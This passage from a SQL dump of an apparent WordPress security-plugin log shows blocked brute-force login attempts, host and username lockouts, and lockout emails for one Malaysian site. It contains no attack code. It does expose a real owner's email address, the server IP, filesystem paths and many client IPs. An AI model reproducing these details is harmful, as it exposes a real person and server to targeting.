2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9uEnlR@6WyRVzpiDqAQAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078712.4897\";s:12:\"REQUEST_TIME\";s:10:\"1569078712\";}}','notice','2019-09-21 15:11:53','2019-09-21 15:11:52',19229680,20717920,'https://bintara.com.my/test/wp-login.php',1,0,'62.213.11.241'),(26542,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:11:52\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:11:52\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:11:52\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:11:52\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:11:53','2019-09-21 15:11:52',19314592,20717920,'https://bintara.com.my/test/wp-login.php',1,0,'62.213.11.241'),(26543,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:11:54','2019-09-21 15:11:52',19521664,20717920,'https://bintara.com.my/test/wp-login.php',1,0,'62.213.11.241'),(26544,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9yXkXpgmG5P@iB8lF-gAAAIE\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"142.93.99.56\";s:11:\"REMOTE_PORT\";s:5:\"50202\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9yXkXpgmG5P@iB8lF-gAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078729.4411\";s:12:\"REQUEST_TIME\";s:10:\"1569078729\";}}','notice','2019-09-21 15:12:10','2019-09-21 15:12:09',19229920,20719520,'https://bintara.com.my/blog/wp-login.php',1,0,'142.93.99.56'),(26545,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:12:09\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:12:09\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:12:09\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:12:09\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:12:10','2019-09-21 15:12:09',19312552,20719520,'https://bintara.com.my/blog/wp-login.php',1,0,'142.93.99.56'),(26546,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:12:10','2019-09-21 15:12:09',19520424,20719520,'https://bintara.com.my/blog/wp-login.php',1,0,'142.93.99.56'),(26547,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY920nlR@6WyRVzpiDqGAAAAA4\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"45.117.168.236\";s:11:\"REMOTE_PORT\";s:5:\"54160\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY920nlR@6WyRVzpiDqGAAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078747.9458\";s:12:\"REQUEST_TIME\";s:10:\"1569078747\";}}','notice','2019-09-21 15:12:29','2019-09-21 15:12:28',19229480,20717000,'https://bintara.com.my/wp/wp-login.php',1,0,'45.117.168.236'),(26548,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:12:28\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:12:28\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:12:28\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:12:28\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:12:29','2019-09-21 15:12:28',19314672,20717000,'https://bintara.com.my/wp/wp-login.php',1,0,'45.117.168.236'),(26549,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:12:29','2019-09-21 15:12:28',19522296,20717000,'https://bintara.com.my/wp/wp-login.php',1,0,'45.117.168.236'),(26550,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9@HkXpgmG5P@iB8lGBAAAAJI\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.165.245\";s:11:\"REMOTE_PORT\";s:5:\"57664\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9@HkXpgmG5P@iB8lGBAAAAJI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078777.1432\";s:12:\"REQUEST_TIME\";s:10:\"1569078777\";}}','notice','2019-09-21 15:12:58','2019-09-21 15:12:57',19230624,20718624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'50.63.165.245'),(26551,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:12:57\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:12:57\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:12:57\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:12:57\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:12:58','2019-09-21 15:12:57',19315592,20718624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'50.63.165.245'),(26552,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:12:58','2019-09-21 15:12:57',19522912,20718624,'https://bintara.com.my/wordpress/wp-login.php',1,0,'50.63.165.245'),(26553,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY@GUnlR@6WyRVzpiDqPgAAAAM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"165.22.177.25\";s:11:\"REMOTE_PORT\";s:5:\"46780\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY@GUnlR@6WyRVzpiDqPgAAAAM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078809.3294\";s:12:\"REQUEST_TIME\";s:10:\"1569078809\";}}','notice','2019-09-21 15:13:30','2019-09-21 15:13:29',19229680,20717920,'https://bintara.com.my/blog/wp-login.php',1,0,'165.22.177.25'),(26554,0,'lockout','host-lockout::165.22.177.25','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"165.22.177.25\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:13:29\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:13:29\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:13:29\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:13:29\";s:12:\"lockout_host\";s:13:\"165.22.177.25\";}','action','2019-09-21 15:13:30','2019-09-21 15:13:29',19315352,20717920,'https://bintara.com.my/blog/wp-login.php',1,0,'165.22.177.25'),(26555,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"165.22.177.25\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:13:29\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:13:29\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:13:29\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:13:29\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:13:30','2019-09-21 15:13:29',19315320,20717920,'https://bintara.com.my/blog/wp-login.php',1,0,'165.22.177.25'),(26556,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:13:30','2019-09-21 15:13:29',19523256,20717920,'https://bintara.com.my/blog/wp-login.php',1,0,'165.22.177.25'),(26557,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY@LnkXpgmG5P@iB8lGDgAAAJA\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"167.114.118.135\";s:11:\"REMOTE_PORT\";s:5:\"47420\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY@LnkXpgmG5P@iB8lGDgAAAJA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078830.6546\";s:12:\"REQUEST_TIME\";s:10:\"1569078830\";}}','notice','2019-09-21 15:13:52','2019-09-21 15:13:51',19228768,20717488,'https://bintara.com.my/wp/wp-login.php',1,0,'167.114.118.135'),(26558,0,'lockout','host-lockout::167.114.118.135','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:15:\"167.114.118.135\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:13:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:13:51\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:13:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:13:51\";s:12:\"lockout_host\";s:15:\"167.114.118.135\";}','action','2019-09-21 15:13:52','2019-09-21 15:13:51',19314784,20717488,'https://bintara.com.my/wp/wp-login.php',1,0,'167.114.118.135'),(26559,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:15:\"167.114.118.135\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:13:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:13:51\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:13:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:13:51\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:13:52','2019-09-21 15:13:51',19314752,20717488,'https://bintara.com.my/wp/wp-login.php',1,0,'167.114.118.135'),(26560,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:13:52','2019-09-21 